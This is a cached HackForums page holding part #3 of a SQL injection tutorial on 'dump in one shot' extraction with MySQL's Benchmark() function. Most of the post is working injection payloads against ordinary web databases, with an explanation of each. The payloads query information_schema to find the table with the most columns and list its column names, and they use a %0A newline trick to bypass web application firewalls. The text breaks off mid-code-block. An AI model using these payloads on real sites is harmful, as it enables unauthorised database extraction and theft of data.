<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4148766" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4148766" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4148766</a>. It is a snapshot of the page as it appeared on 15 Apr 2014 23:08:14 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4148766" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:l1yi8A4D7YMJ:www.hackforums.net/showthread.php%3Ftid%3D4148766&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] dump in one shot with Benchmark() - part #3 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] dump in one shot with Benchmark() - part #3"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4148766"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-15-2014, 03:08 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] dump in one shot with Benchmark() - part #3</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4148766" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/rating.js"></script><div id="success_rating_4148766" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4148766"><li style="width: 0%" class="current_rating" id="current_rating_4148766">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4148766&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4148766&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4148766&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4148766&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4148766&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4148766" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4148766_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4148766" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4148766&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4148766");
// -->
</script><div><strong>[SQLi tutorial] dump in one shot with Benchmark() - part #3</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39247991" id="pid39247991"></a><table class="tborder" style="border-top-width: 0; " id="post_39247991" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-02-2014, 12:08 PM <span id="edited_by_39247991"><span class="smalltext">(This post was last modified: 04-02-2014 02:05 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4148766&amp;pid=39247991#pid39247991">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img title=" ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page." src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,239<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39247991">In <a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank"><span style="text-decoration: underline;">part #1</span></a> of this tutorial I explained how to use function <span style="color: #32CD32;"><span style="font-weight: bold;">Benchmark()</span> </span>for <span style="color: #FFD700;">dump in one shot (DIOS)</span>. See in my tutorials what DIOS is - starting <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4137953" target="_blank">part #2</a></span> we were talking about <span style="color: #FFA500;">more complex</span> use of <span style="color: #FFD700;">DIOS with Benchmark()</span>.
 We saw triple DIOS (with two nested DIOS). From that tutorial we 
learned we can't use data stored in variables in one DIOS also in some 
other DIOS. They are local to each DIOS syntax. That is true for 
standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. <span style="color: #FFD700;">The most important thing to remember was</span> <span style="color: #32CD32;">when using benchmark based DIOS</span> <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFA500;">we can</span></span></span> <span style="color: #FFD700;">use data stored in variables in different DIOS.</span><br><br>In this <span style="color: #FFA500;">part #3</span> (and next two upcoming tutorials #4 and #5) I will show you different ways to combine standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> with <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>. <span style="color: #FF1493;">I usually open challenges with some purpose so those parts of tutorial are related to my challenges</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span>, <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span> and <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4114967" target="_blank">#97</a></span>.<br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Challenge</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span></span></span><br><br>Tasks in that challenge were:<ul><li>display version with your name</li> <li>display the name of primary database table with highest columns count</li> <li>display numbered list with column names from that table in ascending order<br></li></ul><br>To solve that challenge will use standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> for "statistics" (<span style="color: #32CD32;">seeking for table_name with highest columns count</span>) and <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span> for displaying columns from table with highest columns count. Decision for <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span> is clear because only there we can use data (<span style="color: #32CD32;">table_name with highest columns count</span>) stored in a variable in "statistics" part of the challenge.<br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">#1</span></span></span><br><span style="font-weight: bold;"><span style="color: #FFD700;">Finding table name in primary database with highest columns count</span></span><br><br>For that purpose we will use:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">Select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">Select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">c</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">c_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">c_max_t_name</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">n</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">0A&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(&nbsp;@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;</span><span style="color: #66CCFF">length</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">Table_name</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">c</span><span style="color: #7AC07C">:=(</span><span style="color: #66CCFF">Select&nbsp;count</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">0A&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">))&nbsp;&gt;&nbsp;@</span><span style="color: #66CCFF">c_max&nbsp;</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">c_max</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">c</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">c_max_t_name</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">)&gt;</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;)<br>))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>Let's analyze that code. It is regular DIOS where we initialized 4 variables where we will store data for:<br><br><span style="color: #FFD700;">(@c:=0x00)</span> --&gt; number of columns in table from actual iteration<br><span style="color: #FFD700;">(@tbl:=0x00)</span> --&gt; table name from actual iteration<br><span style="color: #FFD700;">(@c_max:=0x00)</span> --&gt; highest columns count in some table so far<br><span style="color: #FFD700;">(@c_max_t_name:=0x00)</span> --&gt; table name of the table with highest columns count so far.<br><br>To bypass WAF we used <span style="color: #FF1493;">%0A</span> right after <span style="color: #FF1493;">where</span> part of the command.<br><br>Complete checking for table name with highest columns count is executed with <span style="color: #32CD32;">4</span> nested <span style="font-weight: bold;"><span style="color: #00BFFF;">if()</span></span> commands. In first if() command we use dummy testing for table name length just to save table name in each iteration to <span style="color: #FFD700;">@tbl</span>. That data we will need later for counting columns for some table in present iteration within DIOS.<br><br>if( <span style="color: #FFA500;">length(@tbl:=Table_name)&gt;0</span>, <span style="color: #32CD32;">True</span>, <span style="color: #00BFFF;">False</span>)<br><br>That part will be always true so code execution will continue at <span style="color: #32CD32;">True part</span>. There we will put next if() command:<br><br>if( <span style="color: #FFA500;">(@c:=(Select
 count(column_name)from information_schema.columns where%0A 
table_schema=database() and table_name=@tbl)) &gt; @c_max</span>, <span style="color: #32CD32;">True</span>, <span style="color: #00BFFF;">False</span>)<br><br>In that part we will store columns count of the actual table in iteration to local variable <span style="color: #FFD700;">@c</span>. If that number is greater then highest column count number stored in local variable <span style="color: #FFD700;">@c_max</span> so far, execution will be continued at <span style="color: #32CD32;">True part</span>, otherwise nothing will be done (<span style="color: #00BFFF;">False part</span>) and iteration in DIOS will continue to next columns and tables inside complete DIOS.<br><br>If we have new highest column count execution continues at <span style="color: #32CD32;">True part</span> where we make sure to remember new highest value with next if() command:<br><br>if( <span style="color: #FFA500;">(@c_max:=@c)&gt;0</span>, <span style="color: #32CD32;">True</span>, <span style="color: #00BFFF;">False</span>),<br><br>First we make a dummy test <span style="color: #FFA500;">(@c_max:=@c)&gt;0</span> just to store present column count stored in <span style="color: #FFD700;">@c</span> to local variable <span style="color: #FFD700;">@c_max</span>
 where we have highest columns count so far. I am using that dummy check
 only for preventing output to screen. Without that part those numbers 
would be visible in SQLi output.<br><br>As <span style="color: #FFA500;">(@c_max:=@c)&gt;0</span> will always be true, code execution will continue again in <span style="color: #32CD32;">True part</span>.<br><br>There we will put last if() statement:<br><br>if(<span style="color: #FFA500;">(@c_max_t_name:=@tbl)&gt;0</span>, <span style="color: #32CD32;">0x00</span>, <span style="color: #00BFFF;">0x00</span>)<br><br>Here we assign table name (with highest columns count so far) to local variable <span style="color: #FFD700;">@c_max_t_name</span>. We will need that table name later for displaying columns from that table. In both cases (<span style="color: #32CD32;">True</span> or <span style="color: #00BFFF;">False</span>) nothing (except storing table name) is done (we put 0x00 on both places).<br><br>After all iterations in standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> are over we will know which table name in primary database has highest columns count. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">#2</span></span></span><br><span style="font-weight: bold;"><span style="color: #FFD700;">Displaying columns from table with highest columns count</span></span><br><br>First ("statistical") part is done. In next part we must display columns from that table. As challenge rules prohibited use of <span style="color: #FF0000;">group_concat </span>function
 only dump in one shot (DIOS) can be used. But because we can't use data
 stored in variables in different dumps in one shot syntax we can't use 
standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. The only solution was to use <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">benchmark based DIOS</span></a>.<br><br>That part is quite easy after we know how to use benchmark:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat<br></span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">clm</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;if(</span><span style="color: #66CCFF">benchmark<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">c_max</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">LPAD</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">nmb</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">2b1</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">2</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x30</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x2e20</span><span style="color: #7AC07C">,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">clm</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;where</span><span style="color: #7AC07C">%</span><span style="color: #66CCFF">0A&nbsp;table_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">c_max_t_name&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">clm&nbsp;order&nbsp;by&nbsp;column_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">),&nbsp;</span><span style="color: #66CCFF">0x3c62723e<br></span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>In benchmark we used variable <span style="color: #FFD700;">@c_max</span> from standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> where highest columns count was stored. That number we will use for number of iterations within benchmark.<br><br>For numbering part of all columns we used local variable <span style="color: #FFD700;">@nmb</span>. After it we stored actual column name in present iteration to local variable <span style="color: #FFD700;">@clm</span>. That local variable is used to skip always to new column name in part:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">clm&nbsp;<br></span></code></div></div></div><br>To know which column names we want we used local variable <span style="color: #FFD700;">@c_max_t_name</span> from standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. There we stored table name of the table with highest columns count. We needed that data for part:<br><div class="codeblock 